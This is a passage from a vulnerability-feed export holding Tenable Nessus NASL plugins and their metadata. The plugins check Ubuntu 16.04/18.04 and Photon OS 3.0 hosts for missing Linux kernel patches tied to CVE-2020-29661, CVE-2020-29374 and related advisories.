(C) 2021 Canonical, Inc. / NASL script (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('ksplice.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n rm_kb_item(name:'Host/uptrack-uname-r');\n cve_list = make_list('CVE-2020-27815', 'CVE-2020-29374', 'CVE-2020-29568', 'CVE-2020-29660', 'CVE-2020-29661');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for USN-4748-1');\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'linux-image-4.4.0-1088-kvm', 'pkgver': '4.4.0-1088.97'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.4.0-1122-aws', 'pkgver': '4.4.0-1122.136'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.4.0-1146-raspi2', 'pkgver': '4.4.0-1146.156'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.4.0-1150-snapdragon', 'pkgver': '4.4.0-1150.160'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.4.0-203-generic', 'pkgver': '4.4.0-203.235'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.4.0-203-generic-lpae', 'pkgver': '4.4.0-203.235'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.4.0-203-lowlatency', 'pkgver': '4.4.0-203.235'},\n {'osver': '16.04', 'pkgname': 'linux-image-aws', 'pkgver': '4.4.0.1122.127'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-lpae', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-lpae-lts-utopic', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-lpae-lts-vivid', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-lpae-lts-wily', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-lpae-lts-xenial', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-lts-utopic', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-lts-vivid', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-lts-wily', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-lts-xenial', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-kvm', 'pkgver': '4.4.0.1088.86'},\n {'osver': '16.04', 'pkgname': 'linux-image-lowlatency', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-lowlatency-lts-utopic', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-lowlatency-lts-vivid', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-lowlatency-lts-wily', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-lowlatency-lts-xenial', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-raspi2', 'pkgver': '4.4.0.1146.146'},\n {'osver': '16.04', 'pkgname': 'linux-image-snapdragon', 'pkgver': '4.4.0.1150.142'},\n {'osver': '16.04', 'pkgname': 'linux-image-virtual', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-virtual-lts-utopic', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-virtual-lts-vivid', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-virtual-lts-wily', 'pkgver': '4.4.0.203.209'},\n {'osver': '16.04', 'pkgname': 'linux-image-virtual-lts-xenial', 'pkgver': '4.4.0.203.209'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'linux-image-4.4.0-1088-kvm / linux-image-4.4.0-1122-aws / etc');\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:13", "description": "An update of the linux package has been released.", "edition": 2, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-13T00:00:00", "title": "Photon OS 3.0: Linux PHSA-2021-3.0-0182", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-29569", "CVE-2020-29661", "CVE-2020-29660"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0182_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/144902", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0182. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144902);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2020-29569\", \"CVE-2020-29660\", \"CVE-2020-29661\");\n\n script_name(english:\"Photon OS 3.0: Linux PHSA-2021-3.0-0182\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-182.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-29661\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'linux-api-headers-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-aws-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-aws-devel-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-aws-docs-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-aws-drivers-gpu-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-aws-hmacgen-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-aws-oprofile-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-aws-sound-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-devel-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-docs-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-drivers-gpu-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-drivers-intel-sgx-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-drivers-sound-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-esx-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-esx-devel-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-esx-docs-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-esx-hmacgen-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-hmacgen-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-oprofile-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-python3-perf-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-rt-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-rt-devel-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-rt-docs-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-secure-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-secure-devel-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-secure-docs-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-secure-hmacgen-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-secure-lkcm-4.19.164-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'linux-tools-4.19.164-1.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'linux');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-25T15:23:50", "description": "The remote Ubuntu 16.04 LTS / 18.04 LTS host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the USN-4749-1 advisory.\n\n - An issue was discovered in drivers/accessibility/speakup/spk_ttyio.c in the Linux kernel through 5.9.9.\n Local attackers on systems with the speakup driver could cause a local denial of service attack, aka\n CID-d41227544427. This occurs because of an invalid free when the line discipline is used more than once.\n (CVE-2020-28941)\n\n - An issue was discovered in the Linux kernel before 5.7.3, related to mm/gup.c and mm/huge_memory.c. The\n get_user_pages (aka gup) implementation, when used for a copy-on-write page, does not properly consider\n the semantics of read operations and therefore can grant unintended write access, aka CID-17839856fd58.\n (CVE-2020-29374)\n\n - An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are\n processing watch events using a single thread. If the events are received faster than the thread is able\n to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the\n backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (CVE-2020-29568)\n\n - An issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux\n kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped.\n However, the handler may not have time to run if the frontend quickly toggles between the states connect\n and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving\n guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege\n escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback.\n (CVE-2020-29569)\n\n - A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID,\n aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-23T00:00:00", "title": "Ubuntu 16.04 LTS / 18.04 LTS : Linux kernel vulnerabilities (USN-4749-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-27830", "CVE-2020-27815", "CVE-2020-25669", "CVE-2020-28941", "CVE-2020-29569", "CVE-2020-29374", "CVE-2020-29568", "CVE-2020-29661", "CVE-2020-29660"], "modified": "2021-03-23T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-136-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1079-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws-lts-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1096-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-dell300x", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-16.04-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-136-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1065-oracle", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1108-azure", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1094-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke-4.15", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1093-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure-lts-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1079-gke", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1085-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-136-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1012-dell300x", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws-hwe", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle-lts-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp-lts-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oem", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke"], "id": "UBUNTU_USN-4749-1.NASL", "href": "https://www.tenable.com/plugins/nessus/147983", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4749-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147983);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/24\");\n\n script_cve_id(\n \"CVE-2020-25669\",\n \"CVE-2020-27815\",\n \"CVE-2020-27830\",\n \"CVE-2020-28941\",\n \"CVE-2020-29374\",\n \"CVE-2020-29568\",\n \"CVE-2020-29569\",\n \"CVE-2020-29660\",\n \"CVE-2020-29661\"\n );\n script_xref(name:\"USN\", value:\"4749-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS : Linux kernel vulnerabilities (USN-4749-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS / 18.04 LTS host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the USN-4749-1 advisory.\n\n - An issue was discovered in drivers/accessibility/speakup/spk_ttyio.c in the Linux kernel through 5.9.9.\n Local attackers on systems with the speakup driver could cause a local denial of service attack, aka\n CID-d41227544427. This occurs because of an invalid free when the line discipline is used more than once.\n (CVE-2020-28941)\n\n - An issue was discovered in the Linux kernel before 5.7.3, related to mm/gup.c and mm/huge_memory.c. The\n get_user_pages (aka gup) implementation, when used for a copy-on-write page, does not properly consider\n the semantics of read operations and therefore can grant unintended write access, aka CID-17839856fd58.\n (CVE-2020-29374)\n\n - An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are\n processing watch events using a single thread. If the events are received faster than the thread is able\n to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the\n backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (CVE-2020-29568)\n\n - An issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux\n kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped.\n However, the handler may not have time to run if the frontend quickly toggles between the states connect\n and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving\n guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege\n escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback.\n (CVE-2020-29569)\n\n - A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID,\n aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4749-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-29661\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1012-dell300x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1065-oracle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1079-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1079-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1085-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1093-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1094-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1096-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-1108-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-136-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-136-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15.0-136-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws-hwe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws-lts-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure-lts-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-dell300x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp-lts-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke-4.15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle-lts-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-16.04-edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021 Canonical, 